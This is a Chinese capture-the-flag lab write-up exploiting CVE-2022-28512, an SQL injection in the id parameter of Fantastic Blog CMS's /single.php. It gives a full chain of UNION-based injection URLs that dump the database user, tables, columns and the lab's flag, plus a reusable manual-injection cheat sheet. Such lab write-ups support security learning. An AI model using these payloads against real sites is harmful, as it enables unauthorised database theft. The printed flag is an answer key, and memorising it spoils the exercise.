春秋云镜 CVE-2022-28512
春秋云镜 CVE-2022-28512 Fantastic Blog (CMS) SQL注入
靶标介绍
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
启动场景
漏洞利用
已知/single.php路径下,id参数存在一个SQL注入,构造http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=1
经典单引号 ‘ 报错 ,存在注入点。
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=1%27
order by numbe判断查询的字段,当 表<=实际列数,就不会报错。
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=1%27order%20by%209–+
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=1%27order%20by%2010–+
因此有10列,改变id值为负数发现回显点位为2,4。
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,2,3,4,5,6,7,8,9–+
获取当前用户root@localhost与当前数据库ctf
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,user(),3,database(),5,6,7,8,9–+
获取所有的表名
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,user(),3,(select%20group_concat(TABLE_NAME)from%20information_schema.tables%20where%20table_schema=database()),5,6,7,8,9–+
发现存在表名flag,获取列名
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,user(),3,(select group_concat(column_NAME)from information_schema.columns where table_schema=database() and table_name=‘flag’),5,6,7,8,9–+
注入字段
http://eci-2ze8w6bd39dbnrybdkxw.cloudeci1.ichunqiu.com/single.php?id=-1%27union%20select%201,user(),3,(select%20group_concat(flag)from%20ctf.flag),5,6,7,8,9–+
得到flag
flag{9ef7c22f-9925-4ea2-a345-32899fa5ed2f}
手工注入
| 函数 | 获取信息 |
|---|---|
| user() | 获取当前用户 |
| database() | 获取当前数据库 |
| version() | 获取数据库版本 |
| @@version_compile_os | 获取操作系统版本 |
获取所有的数据库名
(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)
获取所有的表名
(select group_concat(table_name) from information_schema.tables where table_schema=‘数据库名’)
获取所有列名
(select group_concat(column_NAME) from information_schema.columns where table_schema = ‘数据库名’ and table_name =‘表名’)
获取字段值
(select group_concat(列名)from 数据库名.表名)